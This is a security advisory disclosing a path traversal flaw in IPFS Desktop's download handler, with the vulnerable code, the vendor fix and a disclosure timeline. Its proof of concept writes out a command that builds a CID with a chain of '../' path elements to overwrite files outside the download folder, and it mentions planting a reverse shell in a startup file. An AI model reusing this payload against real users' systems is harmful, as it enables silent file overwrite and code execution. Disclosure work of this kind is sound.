Vulnerability Note
1 Summary
IPFS Desktop is a standalone desktop application that bundles go-ipfs with an electron based front-end application.
The desktop application provides an easy way to download IPFS content from within the applications UI, from the application context menu, or a globally installed hotkey (cmd+ctrl+h).
The problem is that the download routing is susceptible to relative path traversal. A malicious CID that contains a relative path traversal may be able to step out of the download directory and overwrite a file anywhere on the system. Since writing of the file is performed with the permissions of the currently logged in user and files are overwritten silently, this may easy lead to availability and integrity problems or code execution.
Here’s a quick PoC. The user would like to download this malicious CID to /downloads/. Instead, a file is silently dropped to /tmp (see finder window below).
2 Details
2.1 Description
IPFS Desktops download CID handler first asks for a destination directory to save files to. A CID, however, may reference a path that is outside of the selected dir by embedding ../ path elements. The download handler does not enforce basedir checks nor sanitize the path as can be seen below. The user selected download path is simply concatenated with the CID’s file path. fs.outputFile() will silently overwrite the file.
async function saveFile (dir, file) {
const location = join(dir, file.path)
await fs.outputFile(location, file.content)
}
https://github.com/ipfs/ipfs-desktop/blob/dfad823/src/download-cid.js#L20-L23
To exploit this vulnerability user interaction is required (performing a file-download for a malicious CID). It is trivial to cause DoS scenarios, mess with the integrity of files, or gain code execution (e.g. dropping a reverse shell executed via a service or taskscheduler/startup file) as the effective user account that was running the IPFS Desktop.
2.2 Proof of Concept
- create the malicious IPFS CID containing the path traversal placing a file in
/tmp/
⇒ OVERRIDE_PATH="../../../../../../../../../../../../tmp/path-traversal-overwrite" node packages/ipfs/src/cli.js add -w README.md
added QmWcwR5BZNcRaH3R36rMxfVrVe4NM2YQgs1DdFc8nBuRbk ../../../../../../../../../../../../tmp/path-traversal-overwrite
added Qmcw4WqifCQcH9xLSkuygu9wwSKzAsJQuCGUgawnMzaexK ../../../../../../../../../../../../tmp
added QmQ7FnJm3giLbBou7g76cNMLZgqc9kdScMSVvnPRJ3JkbB ../../../../../../../../../../../..
added QmbxrahbdpK8GAwZ4xeFnkHPmwEa1Kbc82HJqqBs8bdAkj ../../../../../../../../../../..
added QmdzKKtEnPtXaeW2cXncRtRtqryXHSLSZnKY5eCfy9PLsx ../../../../../../../../../..
added Qma75sSmtexz6mZTvws8cHGaVZUDo59JfKpoupTXd1NqG5 ../../../../../../../../..
added QmXp198gUNnRJ1f8nZ1pi5QxSoVi3JWzadoyn2L8QHL3xM ../../../../../../../..
added QmNW9FwkWFth3oCEg3Lb23pXdn9N2VFvsz4jrVfUTxo4Ep ../../../../../../..
added QmYMVMRMQ5HxPg8t5B8BvqmRLs3p1j5GdNzUXsBgXP34ok ../../../../../..
added Qmb4xy1kDT9Npy5Z2XrhwPEcCHhFe4QTq3C2JVvuiDey5W ../../../../..
added QmXNNFzGn13iJnhHY9zTjJ4NKBvtSqtGSqdNCTNGkt3TC2 ../../../..
added QmPKGBtNQYpQc8XNQUm3Z7i2VEc3ZngQYHPruc35fitteZ ../../..
added QmdXy7kfFruZFoL9jQPfAtYP8pGfsWRRzpqAqCyC26qSpN ../..
added QmWdLbFbDkkXj7Cx6brJ6oTNMSADcSahutMsLWAsj1qikr ..
added QmUoS4btCu8qS1GhY564sLh7LH2GFp5LjHp2Cw3aRBqKCR
-
open ipfs-desktop, hit CMD + CTRL + H (global download hotkey), download malicious CID
QmUoS4btCu8qS1GhY564sLh7LH2GFp5LjHp2Cw3aRBqKCR -
select a download directory in
ipfs-desktop -
wait for the file to be download
Check /tmp/ to find the new file /tmp/path-traversal-overwrite being created.
tintin@takeshii:/tmp|⇒ ls -lsat /tmp/*traversal*
64 -rw-r--r-- 1 tintin wheel 30809 May 21 11:59 /tmp/path-traversal-overwrite
2.3 Proposed Fix
- basedir restriction. path sanitizing
3 Vendor Response
Vendor response: fixed with v0.15.1
3.1 Timeline
Jun/16/2021 - initial disclosure vendor
Jun/17/2021 - fixed with v0.15.1